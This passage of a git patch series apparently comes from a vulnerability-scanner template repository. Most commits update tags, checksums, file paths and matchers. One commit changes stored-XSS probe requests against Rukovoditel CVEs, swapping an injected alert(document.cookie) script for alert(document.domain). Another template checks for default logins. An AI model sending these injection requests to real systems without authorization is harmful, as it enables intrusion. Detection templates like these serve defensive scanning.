a/http/cves/2022/CVE-2022-43166.yaml +++ b/http/cves/2022/CVE-2022-43166.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2022,rukovoditel,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-43169.yaml b/http/cves/2022/CVE-2022-43169.yaml index b45ddcd568..7c8ae41874 100644 --- a/http/cves/2022/CVE-2022-43169.yaml +++ b/http/cves/2022/CVE-2022-43169.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2022,rukovoditel,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: - | diff --git a/http/cves/2022/CVE-2022-43170.yaml b/http/cves/2022/CVE-2022-43170.yaml index 3e45934dcf..3487ba0aea 100644 --- a/http/cves/2022/CVE-2022-43170.yaml +++ b/http/cves/2022/CVE-2022-43170.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2022,rukovoditel,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-43185.yaml b/http/cves/2022/CVE-2022-43185.yaml index 83416143de..7c5d638e81 100644 --- a/http/cves/2022/CVE-2022-43185.yaml +++ b/http/cves/2022/CVE-2022-43185.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2022,rukovoditel,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: - | diff --git a/http/cves/2022/CVE-2022-44944.yaml b/http/cves/2022/CVE-2022-44944.yaml index 5802278e39..cdde910d64 100644 --- a/http/cves/2022/CVE-2022-44944.yaml +++ b/http/cves/2022/CVE-2022-44944.yaml @@ -18,7 +18,7 @@ info: metadata: verified: true shodan-query: http.favicon.hash:-1499940355 - tags: cve,cve2022,rukovoditel,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-44946.yaml b/http/cves/2022/CVE-2022-44946.yaml index 0801892bf4..20e40fab41 100644 --- a/http/cves/2022/CVE-2022-44946.yaml +++ b/http/cves/2022/CVE-2022-44946.yaml @@ -18,7 +18,7 @@ info: metadata: verified: true shodan-query: http.favicon.hash:-1499940355 - tags: cve,cve2022,rukovoditel,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-44949.yaml b/http/cves/2022/CVE-2022-44949.yaml index 2cb5e694f9..e489ae03bd 100644 --- a/http/cves/2022/CVE-2022-44949.yaml +++ b/http/cves/2022/CVE-2022-44949.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2022,rukovoditel,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-44950.yaml b/http/cves/2022/CVE-2022-44950.yaml index b0857fad91..4688775a8f 100644 --- a/http/cves/2022/CVE-2022-44950.yaml +++ b/http/cves/2022/CVE-2022-44950.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2022,rukovoditel,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-44952.yaml b/http/cves/2022/CVE-2022-44952.yaml index 868fa826c6..581ba7e576 100644 --- a/http/cves/2022/CVE-2022-44952.yaml +++ b/http/cves/2022/CVE-2022-44952.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-79 metadata: verified: true - tags: cve,cve2022,rukovoditel,xss,authenticated + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated http: - raw: From c77309373bbb89a1d1b40ed0fb5a03132edab1ed Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 7 Jul 2023 16:21:07 +0530 Subject: [PATCH 474/609] fix payload and directory --- http/cves/2020/CVE-2020-35987.yaml | 4 ++-- {cves => http/cves}/2022/CVE-2022-4295.yaml | 0 http/cves/2022/CVE-2022-43169.yaml | 4 ++-- http/cves/2022/CVE-2022-44948.yaml | 4 ++-- {cves => http/cves}/2023/CVE-2023-36346.yaml | 0 5 files changed, 6 insertions(+), 6 deletions(-) rename {cves => http/cves}/2022/CVE-2022-4295.yaml (100%) rename {cves => http/cves}/2023/CVE-2023-36346.yaml (100%) diff --git a/http/cves/2020/CVE-2020-35987.yaml b/http/cves/2020/CVE-2020-35987.yaml index 14e50a21e4..7f9018f435 100644 --- a/http/cves/2020/CVE-2020-35987.yaml +++ b/http/cves/2020/CVE-2020-35987.yaml @@ -37,7 +37,7 @@ http: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&sort_order=0¬es=test + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test cookie-reuse: true redirects: true @@ -46,7 +46,7 @@ http: dsl: - 'status_code_3 == 200' - 'contains(content_type_3, "text/html")' - - 'contains(body_3, "")' + - 'contains(body_3, "")' - 'contains(body_3, "rukovoditel")' condition: and diff --git a/cves/2022/CVE-2022-4295.yaml b/http/cves/2022/CVE-2022-4295.yaml similarity index 100% rename from cves/2022/CVE-2022-4295.yaml rename to http/cves/2022/CVE-2022-4295.yaml diff --git a/http/cves/2022/CVE-2022-43169.yaml b/http/cves/2022/CVE-2022-43169.yaml index b45ddcd568..bbf75cb37a 100644 --- a/http/cves/2022/CVE-2022-43169.yaml +++ b/http/cves/2022/CVE-2022-43169.yaml @@ -36,7 +36,7 @@ http: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&sort_order=¬es=&ldap_filter= + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=¬es=&ldap_filter= cookie-reuse: true redirects: true @@ -46,7 +46,7 @@ http: dsl: - 'status_code_3 == 200' - 'contains(content_type_3, "text/html")' - - 'contains(body_3, "")' + - 'contains(body_3, "")' - 'contains(body_3, "rukovoditel")' condition: and diff --git a/http/cves/2022/CVE-2022-44948.yaml b/http/cves/2022/CVE-2022-44948.yaml index 90fe854aef..a57e89e948 100644 --- a/http/cves/2022/CVE-2022-44948.yaml +++ b/http/cves/2022/CVE-2022-44948.yaml @@ -36,7 +36,7 @@ http: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&sort_order=0 + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0 cookie-reuse: true redirects: true @@ -46,7 +46,7 @@ http: dsl: - 'status_code_3 == 200' - 'contains(content_type_3, "text/html")' - - 'contains(body_3, "")' + - 'contains(body_3, "")' - 'contains(body_3, "rukovoditel")' condition: and diff --git a/cves/2023/CVE-2023-36346.yaml b/http/cves/2023/CVE-2023-36346.yaml similarity index 100% rename from cves/2023/CVE-2023-36346.yaml rename to http/cves/2023/CVE-2023-36346.yaml From 0f2939cd7900a313392f97c38215bed8fe73f155 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 10:56:40 +0000 Subject: [PATCH 475/609] Auto Generated New Template Addition List [Fri Jul 7 10:56:40 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 00436a2ed8..e352b1a423 100644 --- a/.new-additions +++ b/.new-additions @@ -38,5 +38,6 @@ http/exposures/tokens/alibaba/alibaba-secretkey-id.yaml http/exposures/tokens/asana/asana-client-id.yaml http/exposures/tokens/asana/asana-client-secret.yaml http/exposures/tokens/atlassian-token.yaml +http/misconfiguration/unauth-temporal-web-ui.yaml network/misconfig/apache-dubbo-unauth.yaml network/misconfig/apache-rocketmq-broker-unauth.yaml From 031e7e8bb560f83e52bf09a81eb72c49466b7475 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 10:57:03 +0000 Subject: [PATCH 476/609] Auto Generated Templates Checksum [Fri Jul 7 10:57:02 UTC 2023] :robot: --- templates-checksum.txt | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ed3cd8118b..89ab5da5ac 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2418,6 +2418,7 @@ http/default-logins/pentaho/pentaho-default-login.yaml:cc5e905aaf2d08c1d6fc6920e http/default-logins/phpmyadmin/phpmyadmin-default-login.yaml:7f9ca947f66e10fba981827eb82ecb51f310dcab http/default-logins/powerjob-default-login.yaml:31059f55df76bfebf9c62d062bfc8ae5277fa8dc http/default-logins/prtg/prtg-default-login.yaml:f3ec67392dd47157dd81a0dd584cf0d4e65f73b4 +http/default-logins/pyload/pyload-default-login.yaml:89744e312eebd34384166088a72626917c1dc536 http/default-logins/rabbitmq/rabbitmq-default-login.yaml:0feec88d4d22e1cd0c4879d40a537ec11833f119 http/default-logins/rainloop/rainloop-default-login.yaml:60bfd2b13954b354cfd6dde043a697c7d8848a81 http/default-logins/rancher/rancher-default-login.yaml:0959c87a6644f6b8e4002040bfb6285f0c7a4a21 @@ -3079,6 +3080,7 @@ http/exposed-panels/pulse-secure-panel.yaml:9cc51602b35429af2533e13248a900c0c879 http/exposed-panels/pulse-secure-version.yaml:77ac5bf94d0b539ba09abf06531bdc951dcd1f0a http/exposed-panels/puppetboard-panel.yaml:17ab5a2d4d72030cf9cf10dd9b20c4b4978ca71d http/exposed-panels/pure-storage-login.yaml:35dccafc9cfc461c0980989a63d6e2ccb2aad648 +http/exposed-panels/pyload-panel.yaml:bfdd46fcfa3ca0ce418fc7cfa5f9c1c046f55eb1 http/exposed-panels/pypicloud-panel.yaml:8c3757096a820328509f7e9cd3bd4a88b82acbdc http/exposed-panels/qlik-sense-server.yaml:817373b38871565048c510fb34f5cbc6bbef0d95 http/exposed-panels/qmail-admin-login.yaml:159096692ce7807a6d8d0fe08c461dc6fbe2e391 @@ -4278,6 +4280,7 @@ http/misconfiguration/unauth-ldap-account-manager.yaml:f9d247acd5a4a4be6de3cc438 http/misconfiguration/unauth-mautic-upgrade.yaml:0f20b8a9b50e444a1800cc562b16307b13785082 http/misconfiguration/unauth-mercurial.yaml:f685b56668ce790a8a6d957d6fa3f66b0f9c0ebb http/misconfiguration/unauth-selenium-grid-console.yaml:9ff7020d809f1c112c310ac517d2bf464e82beba +http/misconfiguration/unauth-temporal-web-ui.yaml:0943b57705acd6145a2e2c33d85ef1ec4cb8f79c http/misconfiguration/unauth-wavink-panel.yaml:8b1bf62a41f209317e0cec3ab548d155071255d9 http/misconfiguration/unauth-zwave-mqtt.yaml:9cf54b9740d773180c58201ec9037be57aaf5a75 http/misconfiguration/unauthenticated-alert-manager.yaml:942ecaf12e405a8f15615a69de2768666b0eff55 @@ -5132,7 +5135,7 @@ http/technologies/eyesofnetwork-detect.yaml:b130bd9d1009b6c2ef1d9cdc9189f761a87c http/technologies/fanruanoa-detect.yaml:0cf99c2c5bf4e54ddb014a3a1acbeac573ee53d7 http/technologies/fanruanoa2012-detect.yaml:08581c42659cb53ac71c936d62ad5985d3e45080 http/technologies/fastjson-version.yaml:59787119c6724ed4e3f9bbdb1e63ecde812708fd -http/technologies/favicon-detect.yaml:e82820aa41b331163c10c95b1e02e760f01b4ac9 +http/technologies/favicon-detect.yaml:586ff06b59cd121554f4188d92b2c9fed84ce556 http/technologies/fingerprinthub-web-fingerprints.yaml:5b5cc147acc1c3c6932c8002817781c725d6d060 http/technologies/froxlor-detect.yaml:b900bbc3add15e90d3163a434b51b73b5540ee98 http/technologies/geo-webserver-detect.yaml:ec4850306e016ef0706a4ad8c680a5f14a938e7e @@ -6487,8 +6490,8 @@ network/ftp-anonymous-login.yaml:a674622b755c4a2eb05e535f714ba90eaa1a9829 network/ftp-weak-credentials.yaml:5b8dbf41a9490d719bb506b2b1942ba10831c9aa network/ganglia-xml-grid-monitor.yaml:64fbc138212f342ee6a6e7998777ad21680d079d network/memcached-stats.yaml:2191e9ce7ab2600a59ee35460890fb61f2aff23c -network/misconfig/apache-dubbo-unauth.yaml:7a73145502da2d8eab4e01b2868e9fa4e3a24f6c -network/misconfig/apache-rocketmq-broker-unauth.yaml:6c00290f5205f4632d0bbc2fad3bade6e56aed60 +network/misconfig/apache-dubbo-unauth.yaml:09668afcc0c2b0182f0bf739cb077295a979c353 +network/misconfig/apache-rocketmq-broker-unauth.yaml:a871e00d62ecd6385c67915a9bd200d2dfe0f806 network/misconfig/dropbear-weakalgo.yaml:cf8685d87a0128c0a546c041633a1662d4e814f6 network/misconfig/dropbear-weakmac.yaml:5e49047eec049df0930e0222b820268b2f346024 network/misconfig/unauth-psql.yaml:416b255a199c9a386b4abc910dd34300740d9fd3 @@ -6525,7 +6528,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:c99e99dfe7b6c2a33056d8aa062567cb3f6fcdda +templates-checksum.txt:433fe313c9e26d7e807bb7e811b579a93a2bb766 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From b89feec1b5c4874c2ff5e695e13e60b7ba9deeaf Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 7 Jul 2023 16:27:34 +0530 Subject: [PATCH 477/609] updated matcher --- http/exposed-panels/c2/hookbot-rat.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/http/exposed-panels/c2/hookbot-rat.yaml b/http/exposed-panels/c2/hookbot-rat.yaml index f7bfcca049..03b147df2c 100644 --- a/http/exposed-panels/c2/hookbot-rat.yaml +++ b/http/exposed-panels/c2/hookbot-rat.yaml @@ -7,9 +7,9 @@ info: description: | Hookbot panel were detected. metadata: + verified: true shodan-query: title:"hookbot" - verified: "true" - tags: tech,rat,hookbot,c2,panel + tags: tech,rat,hookbot,c2,panel,detect http: - method: GET @@ -19,5 +19,4 @@ http: matchers: - type: dsl dsl: - - "status_code == 200 && contains(body, 'HOOKBOT')" - condition: and \ No newline at end of file + - "status_code == 200 && contains(body, 'HOOKBOT PANEL')" From 0e6a8cd411bd1fe4f4e11b4274e6cb5d092910e2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 10:57:46 +0000 Subject: [PATCH 479/609] Auto Generated Templates Checksum [Fri Jul 7 10:57:46 UTC 2023] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 89ab5da5ac..6187abc573 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2169,7 +2169,7 @@ http/cves/2022/CVE-2022-3982.yaml:995b0a9d052bec87678838c1acb3f0e2f4454e41 http/cves/2022/CVE-2022-39952.yaml:a72f183386bfaf28386edfc1bf8fc942fdc1ca23 http/cves/2022/CVE-2022-39960.yaml:4056835c7dcb8d36981308a2473aa7e5a56564a1 http/cves/2022/CVE-2022-40022.yaml:968f886d14011acefd840d1750585b527ad00333 -http/cves/2022/CVE-2022-40083.yaml:9ba7fc77af19ea9fd4c26fdba205dfe35dff0010 +http/cves/2022/CVE-2022-40083.yaml:230f7d1a5000d175f79c0d096ac1e935c641ea70 http/cves/2022/CVE-2022-40359.yaml:585ea7fc6f6e4c36cd21cbd769bc5baf762b57fb http/cves/2022/CVE-2022-4050.yaml:473f4be072cbe3ee2cabe9f429220c526f681bf1 http/cves/2022/CVE-2022-4060.yaml:e9484532c54974eae706dacdaf1e80b9519d6ca9 @@ -6528,7 +6528,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:433fe313c9e26d7e807bb7e811b579a93a2bb766 +templates-checksum.txt:52024198b9cf8034ef099da0c6c1b116c8e31ce8 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From f859524bc6e183655597e9f75cd9cccfa3d6b656 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 10:58:45 +0000 Subject: [PATCH 480/609] TemplateMan Update [Fri Jul 7 10:58:45 UTC 2023] :robot: --- http/misconfiguration/unauth-temporal-web-ui.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/misconfiguration/unauth-temporal-web-ui.yaml b/http/misconfiguration/unauth-temporal-web-ui.yaml index 25b3851d7a..e64d5e8fab 100644 --- a/http/misconfiguration/unauth-temporal-web-ui.yaml +++ b/http/misconfiguration/unauth-temporal-web-ui.yaml @@ -10,11 +10,11 @@ info: - https://docs.temporal.io/web-ui classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - verified: 'true' + max-request: 2 shodan-query: http.favicon.hash:557327884 + verified: "true" tags: temporal,unauth http: From e59b1f69625fe1878f3b3ccf1f5ab2d94a1698c4 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 7 Jul 2023 16:30:34 +0530 Subject: [PATCH 481/609] Update esafenet-cdg-default-login.yaml --- http/default-logins/esafenet-cdg-default-login.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/default-logins/esafenet-cdg-default-login.yaml b/http/default-logins/esafenet-cdg-default-login.yaml index ba3344ff72..224c4a043d 100644 --- a/http/default-logins/esafenet-cdg-default-login.yaml +++ b/http/default-logins/esafenet-cdg-default-login.yaml @@ -7,11 +7,11 @@ info: description: | Esafenet electronic document security management system default credentials were discovered. metadata: - verified: "true" + verified: true fofa-query: "esafenet" tags: esafenet,cdg,default-login -requests: +http: - method: POST path: - "{{BaseURL}}/CDGServer3/SystemConfig" @@ -43,9 +43,9 @@ requests: - "est.connection.url" - type: regex + part: body regex: - "(127\\.0\\.0\\.1)|(localhost)(192\\.168|10\\.|172\\.(1[6-9]|2\\d|3[01]))\\.\\d{1,3}\\.\\d{1,3}" - part: body - type: status status: From 36d526ed69f29545f536adde60b6362e0c0217bf Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 11:02:50 +0000 Subject: [PATCH 482/609] Auto Generated New Template Addition List [Fri Jul 7 11:02:50 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e352b1a423..66e5bdda00 100644 --- a/.new-additions +++ b/.new-additions @@ -39,5 +39,6 @@ http/exposures/tokens/asana/asana-client-id.yaml http/exposures/tokens/asana/asana-client-secret.yaml http/exposures/tokens/atlassian-token.yaml http/misconfiguration/unauth-temporal-web-ui.yaml +misconfiguration/proxy/open-proxy-external.yaml network/misconfig/apache-dubbo-unauth.yaml network/misconfig/apache-rocketmq-broker-unauth.yaml From 63eb2db4ad3ea12895f57d0294fd577d85e5b6b4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 11:02:56 +0000 Subject: [PATCH 483/609] Auto Generated Templates Checksum [Fri Jul 7 11:02:56 UTC 2023] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6187abc573..b97589df42 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4280,7 +4280,7 @@ http/misconfiguration/unauth-ldap-account-manager.yaml:f9d247acd5a4a4be6de3cc438 http/misconfiguration/unauth-mautic-upgrade.yaml:0f20b8a9b50e444a1800cc562b16307b13785082 http/misconfiguration/unauth-mercurial.yaml:f685b56668ce790a8a6d957d6fa3f66b0f9c0ebb http/misconfiguration/unauth-selenium-grid-console.yaml:9ff7020d809f1c112c310ac517d2bf464e82beba -http/misconfiguration/unauth-temporal-web-ui.yaml:0943b57705acd6145a2e2c33d85ef1ec4cb8f79c +http/misconfiguration/unauth-temporal-web-ui.yaml:4dab0a01c9fdbf7e8c0bce4d49ee675afeec5146 http/misconfiguration/unauth-wavink-panel.yaml:8b1bf62a41f209317e0cec3ab548d155071255d9 http/misconfiguration/unauth-zwave-mqtt.yaml:9cf54b9740d773180c58201ec9037be57aaf5a75 http/misconfiguration/unauthenticated-alert-manager.yaml:942ecaf12e405a8f15615a69de2768666b0eff55 @@ -6404,6 +6404,7 @@ http/vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml:1ac1379d6f765a6008821b965709d http/vulnerabilities/zend/zend-v1-xss.yaml:625c68da0d08d6c8a1381704b3861de7b6ffad6f http/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml:5cdad439b1340a471900588ca779c1985c865298 http/vulnerabilities/zyxel/unauth-ztp-ping.yaml:61b1a8c05002d6ae6d87cc583301691b2cca06ab +misconfiguration/proxy/open-proxy-external.yaml:e8bd0621346886e2ddd41ca310c609052053cb13 network/backdoor/backdoored-zte.yaml:3aa481fd5f1c0e8e9853646a7fbca35d927911fa network/cisco-smi-exposure.yaml:89fcf6f71dff1403e1845205656ae049948574aa network/clamav-unauth.yaml:795eda3df907879e4b11d230ffe0fffaa6fe022f @@ -6528,7 +6529,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:52024198b9cf8034ef099da0c6c1b116c8e31ce8 +templates-checksum.txt:86eb54b1d5868fd93d419c267b97ea6a7c1a68bb wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 0fa390d19b42b6733fc6d26fd5732976dfe0b3f5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 11:05:25 +0000 Subject: [PATCH 484/609] Auto Generated New Template Addition List [Fri Jul 7 11:05:25 UTC 2023] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 66e5bdda00..9d63b283da 100644 --- a/.new-additions +++ b/.new-additions @@ -16,9 +16,11 @@ http/cves/2018/CVE-2018-6530.yaml http/cves/2023/CVE-2023-0297.yaml http/cves/2023/CVE-2023-28121.yaml http/cves/2023/CVE-2023-2822.yaml +http/default-logins/esafenet-cdg-default-login.yaml http/default-logins/pyload/pyload-default-login.yaml http/exposed-panels/arangodb-web-Interface.yaml http/exposed-panels/arcserve-panel.yaml +http/exposed-panels/c2/hookbot-rat.yaml http/exposed-panels/cloudpanel-login.yaml http/exposed-panels/dell-idrac.yaml http/exposed-panels/efak-login-panel.yaml From 162164be2963d2f14790549656f4fc92e9aaa515 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 11:05:31 +0000 Subject: [PATCH 485/609] Auto Generated Templates Checksum [Fri Jul 7 11:05:31 UTC 2023] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b97589df42..45d56b2bb8 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2568,6 +2568,7 @@ http/exposed-panels/c2/covenant-c2.yaml:32db211a75d38e2e5f807b6f63e9a7f4a40d13b2 http/exposed-panels/c2/deimos-c2.yaml:266a59269734128be0a942812e98d4a9fc7237dc http/exposed-panels/c2/empire-c2.yaml:68c37a16d8bb6605361cbe6e88824035f48f02be http/exposed-panels/c2/evilginx.yaml:71ad6eb248a72fe3315d3c28f010130b4bd5257d +http/exposed-panels/c2/hookbot-rat.yaml:41f6f5282982945787a5a44166a0b276bf6af7b0 http/exposed-panels/c2/mythic-c2.yaml:05a73d58dc669f0fce5b2d15f9f7becfffc1c76c http/exposed-panels/c2/nh-c2.yaml:98303079db934bddaccc41a2896fa0a144b67290 http/exposed-panels/c2/viper-c2.yaml:f8ac1add15145d048821e3939c90435972a0025f @@ -6529,7 +6530,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:86eb54b1d5868fd93d419c267b97ea6a7c1a68bb +templates-checksum.txt:2063b0de3d95c5046874c5f85bb0439512b37442 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 331e96afbab4e91f1d2e70e4917fdb8f31085451 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 11:07:15 +0000 Subject: [PATCH 486/609] TemplateMan Update [Fri Jul 7 11:07:15 UTC 2023] :robot: --- http/exposed-panels/c2/hookbot-rat.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/exposed-panels/c2/hookbot-rat.yaml b/http/exposed-panels/c2/hookbot-rat.yaml index 03b147df2c..37d50d8131 100644 --- a/http/exposed-panels/c2/hookbot-rat.yaml +++ b/http/exposed-panels/c2/hookbot-rat.yaml @@ -7,8 +7,9 @@ info: description: | Hookbot panel were detected. metadata: - verified: true + max-request: 1 shodan-query: title:"hookbot" + verified: true tags: tech,rat,hookbot,c2,panel,detect http: From f7204ac6434a218ff96a1b527ced2b7e95111a8a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 11:07:24 +0000 Subject: [PATCH 487/609] TemplateMan Update [Fri Jul 7 11:07:24 UTC 2023] :robot: --- http/default-logins/esafenet-cdg-default-login.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/default-logins/esafenet-cdg-default-login.yaml b/http/default-logins/esafenet-cdg-default-login.yaml index 224c4a043d..6fde20f03e 100644 --- a/http/default-logins/esafenet-cdg-default-login.yaml +++ b/http/default-logins/esafenet-cdg-default-login.yaml @@ -7,8 +7,9 @@ info: description: | Esafenet electronic document security management system default credentials were discovered. metadata: + fofa-query: esafenet + max-request: 32 verified: true - fofa-query: "esafenet" tags: esafenet,cdg,default-login http: From 88bb3eb0d1867369a87db6ee30ffc7cc138d03f2 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 7 Jul 2023 16:39:23 +0530 Subject: [PATCH 488/609] Rename http/misconfiguration/sitemap-sql-injection.yaml to http/vulnerabilities /other/sitemap-sql-injection.yaml --- .../other}/sitemap-sql-injection.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename http/{misconfiguration => vulnerabilities /other}/sitemap-sql-injection.yaml (96%) diff --git a/http/misconfiguration/sitemap-sql-injection.yaml b/http/vulnerabilities /other/sitemap-sql-injection.yaml similarity index 96% rename from http/misconfiguration/sitemap-sql-injection.yaml rename to http/vulnerabilities /other/sitemap-sql-injection.yaml index b869d01d72..8db450a0e2 100644 --- a/http/misconfiguration/sitemap-sql-injection.yaml +++ b/http/vulnerabilities /other/sitemap-sql-injection.yaml @@ -22,4 +22,4 @@ http: - 'duration>=6' - 'status_code == 200' - 'contains(header, "application/xml") && contains(body, "sitemap>")' - condition: and \ No newline at end of file + condition: and From 1565dc651744355006369ce7541b470c716c222b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 7 Jul 2023 16:40:25 +0530 Subject: [PATCH 489/609] Rename universal-media-xss.yaml to universal-media-xss.yaml --- http/vulnerabilities/{others => other}/universal-media-xss.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename http/vulnerabilities/{others => other}/universal-media-xss.yaml (100%) diff --git a/http/vulnerabilities/others/universal-media-xss.yaml b/http/vulnerabilities/other/universal-media-xss.yaml similarity index 100% rename from http/vulnerabilities/others/universal-media-xss.yaml rename to http/vulnerabilities/other/universal-media-xss.yaml From 